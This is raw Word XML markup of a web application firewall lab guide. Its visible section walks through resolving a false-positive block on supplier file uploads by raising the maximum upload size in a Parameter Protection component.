                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A71415" w14:textId="1E91489B" w:rsidR="00163BC3" w:rsidRDefault="38DD7BB8" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidR="03E60FA1" w:rsidRPr="59C4101A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B75E0E3" w14:textId="0381EF15" w:rsidR="004C5DB5" w:rsidRDefault="26A942C8" w:rsidP="00795EB6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Test out the website – see if that fixed it</w:t>
      </w:r>
      <w:r w:rsidR="004C5DB5">
        <w:t>!</w:t>
      </w:r>
      <w:r w:rsidR="001A0E4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB7E6FF" w14:textId="0C32716A" w:rsidR="00265211" w:rsidRDefault="00D450FF" w:rsidP="00265211">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="0005619E">
        <w:t>alse Positive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="001A0E4D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t>File Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6004CD25" w14:textId="77777777" w:rsidR="001713D4" w:rsidRDefault="00FF500C">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
      <w:r w:rsidR="52040ECA">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:t>One of my suppliers is having trouble uploading their price lists</w:t>
      </w:r>
      <w:r w:rsidR="7A2FB86E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">He is going to the “Supplier Login” section, entering his email </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>big@spender.com ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> his password “money”, and clicking Login.</w:t>
      </w:r>
      <w:r w:rsidR="20B7B257">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:t xml:space="preserve">Note: My supplier has made the price list for you to troubleshoot with available at: </w:t>
      </w:r>
      <w:hyperlink r:id="rId41">
        <w:r w:rsidR="184C1F62" w:rsidRPr="32F6121D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="184C1F62">
        <w:t xml:space="preserve"> .  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F958AA3" w14:textId="77777777" w:rsidR="001713D4" w:rsidRDefault="001713D4">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:t xml:space="preserve">ave this </w:t>
      </w:r>
      <w:r w:rsidR="28EB0930">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:t>to your computer</w:t>
      </w:r>
      <w:r w:rsidR="391B9172">
        <w:t xml:space="preserve"> now.   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0B10F" w14:textId="2C39BC26" w:rsidR="00FF500C" w:rsidRDefault="00AE2927">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>So</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> click choose file, select that file, </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t xml:space="preserve">enter a filename of “my-pricelist.doc”, and click Upload. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD9296" w14:textId="3ECAEB00" w:rsidR="687CA52E" w:rsidRDefault="4B8AB2B2" w:rsidP="699639B3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="392AB527" wp14:editId="2184C233">
            <wp:extent cx="2080171" cy="1801078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1569228050" name="Picture 156922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22805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80171" cy="1801078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="4960FEF7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="433D0333" wp14:editId="4CB5B0C0">
            <wp:extent cx="2867025" cy="1699999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="623780379" name="Picture 62378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78037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67025" cy="1699999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0F6707" w14:textId="3E0C271A" w:rsidR="5F910CE0" w:rsidRDefault="00C6788C" w:rsidP="699639B3">
      <w:r>
        <w:t xml:space="preserve">Why are </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">you </w:t>
      </w:r>
      <w:r w:rsidR="5F910CE0">
        <w:t xml:space="preserve"> blocked</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD4257A" w14:textId="0F37929F" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62008CD1" w14:textId="1B1740DD" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:r>
        <w:t>What does the Firewall Log entry say when you try it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66201DBF" w14:textId="1926A914" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Hint 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B312D51" w14:textId="763A8CC0" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:r>
        <w:t>Files are uploaded through URL parameters. Which component would you expect to use to control parameter limits?</w:t>
      </w:r>
      <w:r w:rsidR="00C6788C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E493966" w14:textId="09F16140" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C79CB" w14:textId="1E9669BC" w:rsidR="00FF500C" w:rsidRDefault="778FF361" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C" w:rsidRPr="32F6121D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parameter Protection</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:t xml:space="preserve"> you previously </w:t>
      </w:r>
      <w:r w:rsidR="0A9720DC">
        <w:t>added.</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D9E00" w14:textId="6FD3ECB9" w:rsidR="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the Max Upload File Size input and change it to 10240 (10MB).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302D6800" w14:textId="66748993" w:rsidR="00FF500C" w:rsidRPr="00FF500C" w:rsidRDefault="00FF500C" w:rsidP="00FF500C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C65440D" w14:textId="1E1D7785" w:rsidR="27A2EE48" w:rsidRDefault="2CFD1F03" w:rsidP="699639B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test again </w:t>
      </w:r>
      <w:r w:rsidR="44EEB6D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3673FD4D" wp14:editId="1CCE03E4">
            <wp:extent cx="2213162" cy="756164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119255084" name="Picture 11925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550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13162" cy="756164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27E095" w14:textId="1FDBF665" w:rsidR="326B0EE2" w:rsidRDefault="326B0EE2" w:rsidP="21B1CB40"/>
    <w:p w14:paraId="5E3B81E8" w14:textId="095BF033" w:rsidR="326B0EE2" w:rsidRDefault="326B0EE2" w:rsidP="32F6121D"/>
    <w:p w14:paraId="48686316" w14:textId="77777777" w:rsidR="0045382E" w:rsidRDefault="0045382E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2448FD7F" w14:textId="6BB98D23" w:rsidR="1A3BB3AD" w:rsidRPr="00CA04DC" w:rsidRDefault="00CA04DC" w:rsidP="0045382E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA04DC">
        <w:lastRenderedPageBreak/>
        <w:t>THE END</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="1A3BB3AD" w:rsidRPr="00CA04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intelligence.xml><?xml version="1.0" encoding="utf-8"?>
<int:Intelligence xmlns:int="http://schemas.microsoft.com/office/intelligence/2019/intelligence">
  <int:IntelligenceSettings/>
  <int:Manifest>
    <int:WordHash hashCode="+hy8M85sF9u9T4" id="bLBiEny8"/>
    <int:WordHash hashCode="kajDhAlKYMTjji" id="vyY3P5Wu"/>
    <int:WordHash hashCode="wCgj9rKdcuGrsF" id="KAI/7B2G"/>
    <int:WordHash hashCode="NQmjNebJV7gKRy" id="Iyf4dBL+"/>
  </int:Manifest>
  <int:Observations>
    <int:Content id="bLBiEny8">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="vyY3P5Wu">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="KAI/7B2G">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="Iyf4dBL+">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93722"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="942E2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A5F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE1E7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4069E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418A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86FB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418A5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B60B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6D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D70C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418A5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568DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="303A7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906A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29BA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544F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="71703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8D6EB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38D0DD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41808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38DA7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41AC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F69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63D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7090D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843EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13DAF5EA"/>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A01BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90D486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D5216C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AB9E5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31A3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DC761C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2458D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB86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9B427A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E35E4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BF2064"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D683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660F44"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A36E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D6B7B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="383E2C12"/>
    <w:lvl w:ilvl="0" w:tplc="292490BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="3F70F942">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="073E59DA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="7EC4AF08">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="70C0E4FC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4C942A58">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F79EF1DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9028BA38">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8E98E41A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5DD86DAE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66009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E65098"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D3422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4010D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FDC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C854A0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D36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C32218"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="67F24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D322EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E184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9405E6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1EA04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572CD2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C84C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7"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="12"/>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7D8"/>
    <w:rsid w:val="0000459B"/>
    <w:rsid w:val="00005796"/>
    <w:rsid w:val="000211D7"/>
    <w:rsid w:val="0002777C"/>
    <w:rsid w:val="0003003E"/>
    <w:rsid w:val="00035791"/>
    <w:rsid w:val="00044744"/>
    <w:rsid w:val="00051308"/>
    <w:rsid w:val="000539EB"/>
    <w:rsid w:val="0005619E"/>
    <w:rsid w:val="00057429"/>
    <w:rsid w:val="00061193"/>
    <w:rsid w:val="00064B43"/>
    <w:rsid w:val="00066E6C"/>
    <w:rsid w:val="00072E2A"/>
    <w:rsid w:val="00085EA0"/>
    <w:rsid w:val="00092C9C"/>
    <w:rsid w:val="0009366E"/>
    <w:rsid w:val="000B344F"/>
    <w:rsid w:val="000C01C7"/>
    <w:rsid w:val="000E572F"/>
    <w:rsid w:val="00117FA8"/>
    <w:rsid w:val="00130C05"/>
    <w:rsid w:val="00132AF4"/>
    <w:rsid w:val="00163BC3"/>
    <w:rsid w:val="00165A23"/>
    <w:rsid w:val="00165C52"/>
    <w:rsid w:val="001713D4"/>
    <w:rsid w:val="00193CCF"/>
    <w:rsid w:val="001A0E4D"/>
    <w:rsid w:val="001A6FEB"/>
    <w:rsid w:val="001C2E62"/>
    <w:rsid w:val="001C79E3"/>
    <w:rsid w:val="001D4841"/>
    <w:rsid w:val="001E79D3"/>
    <w:rsid w:val="001F030B"/>
    <w:rsid w:val="00216355"/>
    <w:rsid w:val="00216411"/>
    <w:rsid w:val="00220C64"/>
    <w:rsid w:val="00233C4A"/>
    <w:rsid w:val="00265211"/>
    <w:rsid w:val="002939CF"/>
    <w:rsid w:val="002B1ABD"/>
    <w:rsid w:val="002F3A9D"/>
    <w:rsid w:val="002F558A"/>
    <w:rsid w:val="00300C97"/>
    <w:rsid w:val="003048C0"/>
    <w:rsid w:val="00307BB7"/>
    <w:rsid w:val="003206DE"/>
    <w:rsid w:val="00330717"/>
    <w:rsid w:val="00335A8B"/>
    <w:rsid w:val="0034774B"/>
    <w:rsid w:val="00350D57"/>
    <w:rsid w:val="00357709"/>
    <w:rsid w:val="00364438"/>
    <w:rsid w:val="003972D7"/>
    <w:rsid w:val="003A2A06"/>
    <w:rsid w:val="003B23D0"/>
    <w:rsid w:val="003B433C"/>
    <w:rsid w:val="003B48A4"/>
    <w:rsid w:val="00406195"/>
    <w:rsid w:val="00407B87"/>
    <w:rsid w:val="00430547"/>
    <w:rsid w:val="00432FC1"/>
    <w:rsid w:val="00435160"/>
    <w:rsid w:val="0044252F"/>
    <w:rsid w:val="00442916"/>
    <w:rsid w:val="0044678B"/>
    <w:rsid w:val="0045382E"/>
    <w:rsid w:val="00457F40"/>
    <w:rsid w:val="00463776"/>
    <w:rsid w:val="00471AC8"/>
    <w:rsid w:val="004739DE"/>
    <w:rsid w:val="00497083"/>
    <w:rsid w:val="004A044A"/>
    <w:rsid w:val="004A053E"/>
    <w:rsid w:val="004A3C9E"/>
    <w:rsid w:val="004A7A51"/>
    <w:rsid w:val="004B394E"/>
    <w:rsid w:val="004B3EB5"/>
    <w:rsid w:val="004B4146"/>
    <w:rsid w:val="004B6A8F"/>
    <w:rsid w:val="004C306A"/>
    <w:rsid w:val="004C3974"/>
    <w:rsid w:val="004C5DB5"/>
    <w:rsid w:val="004C67A2"/>
    <w:rsid w:val="004E3114"/>
    <w:rsid w:val="0050605A"/>
    <w:rsid w:val="00524D2A"/>
    <w:rsid w:val="00532BCB"/>
    <w:rsid w:val="00533381"/>
    <w:rsid w:val="00544AC0"/>
    <w:rsid w:val="0055414F"/>
    <w:rsid w:val="00562548"/>
    <w:rsid w:val="0058093A"/>
    <w:rsid w:val="005A17E3"/>
    <w:rsid w:val="005A2598"/>
    <w:rsid w:val="005B6E1F"/>
    <w:rsid w:val="005E5001"/>
    <w:rsid w:val="005F3A21"/>
    <w:rsid w:val="0066149A"/>
    <w:rsid w:val="00670816"/>
    <w:rsid w:val="00671D54"/>
    <w:rsid w:val="00683ACD"/>
    <w:rsid w:val="006B1901"/>
    <w:rsid w:val="006B1F5E"/>
    <w:rsid w:val="006B6C0B"/>
    <w:rsid w:val="006C2752"/>
    <w:rsid w:val="006C796E"/>
    <w:rsid w:val="006E590C"/>
    <w:rsid w:val="007045EA"/>
    <w:rsid w:val="0070629D"/>
    <w:rsid w:val="00706655"/>
    <w:rsid w:val="00707FF5"/>
    <w:rsid w:val="007333E7"/>
    <w:rsid w:val="007424B9"/>
    <w:rsid w:val="00742FDD"/>
    <w:rsid w:val="0075202B"/>
    <w:rsid w:val="00775B17"/>
    <w:rsid w:val="00780B9B"/>
    <w:rsid w:val="0078279F"/>
    <w:rsid w:val="00787005"/>
    <w:rsid w:val="0078783F"/>
    <w:rsid w:val="007C1685"/>
    <w:rsid w:val="007D01EA"/>
    <w:rsid w:val="007D14D6"/>
    <w:rsid w:val="007D2CCA"/>
    <w:rsid w:val="007E4561"/>
    <w:rsid w:val="007E615C"/>
    <w:rsid w:val="00816D3F"/>
    <w:rsid w:val="00822AE6"/>
    <w:rsid w:val="00823CD9"/>
    <w:rsid w:val="0082437E"/>
    <w:rsid w:val="00826FB4"/>
    <w:rsid w:val="008278E0"/>
    <w:rsid w:val="008354EB"/>
    <w:rsid w:val="00842B10"/>
    <w:rsid w:val="00844F45"/>
    <w:rsid w:val="008567D8"/>
    <w:rsid w:val="00874BC9"/>
    <w:rsid w:val="0087636E"/>
    <w:rsid w:val="0088536F"/>
    <w:rsid w:val="008A4FBA"/>
    <w:rsid w:val="008C707D"/>
    <w:rsid w:val="008D49F7"/>
    <w:rsid w:val="008D6465"/>
    <w:rsid w:val="008E0B96"/>
    <w:rsid w:val="008E239E"/>
    <w:rsid w:val="008F112A"/>
    <w:rsid w:val="008F1BC3"/>
    <w:rsid w:val="008F3E5B"/>
    <w:rsid w:val="009005C2"/>
    <w:rsid w:val="00906956"/>
    <w:rsid w:val="009307BA"/>
    <w:rsid w:val="009311D9"/>
    <w:rsid w:val="009317F6"/>
    <w:rsid w:val="00934A79"/>
    <w:rsid w:val="00937DCC"/>
    <w:rsid w:val="00951BD4"/>
    <w:rsid w:val="009545D1"/>
    <w:rsid w:val="00956929"/>
    <w:rsid w:val="009638F5"/>
    <w:rsid w:val="009743FA"/>
    <w:rsid w:val="009839C7"/>
    <w:rsid w:val="009A3456"/>
    <w:rsid w:val="009C2D2C"/>
    <w:rsid w:val="009C7DBD"/>
    <w:rsid w:val="009D66ED"/>
    <w:rsid w:val="009D6C0F"/>
    <w:rsid w:val="009E78B7"/>
    <w:rsid w:val="009F3944"/>
    <w:rsid w:val="00A0423C"/>
    <w:rsid w:val="00A06241"/>
    <w:rsid w:val="00A220E2"/>
    <w:rsid w:val="00A32331"/>
    <w:rsid w:val="00A34C4A"/>
    <w:rsid w:val="00A37923"/>
    <w:rsid w:val="00A41322"/>
    <w:rsid w:val="00A44E69"/>
    <w:rsid w:val="00A51F32"/>
    <w:rsid w:val="00A575CC"/>
    <w:rsid w:val="00A6431B"/>
    <w:rsid w:val="00A662E2"/>
    <w:rsid w:val="00A77C3A"/>
    <w:rsid w:val="00A859D0"/>
    <w:rsid w:val="00A87A1A"/>
    <w:rsid w:val="00A902BF"/>
    <w:rsid w:val="00A94FC9"/>
    <w:rsid w:val="00AA6057"/>
    <w:rsid w:val="00AA743A"/>
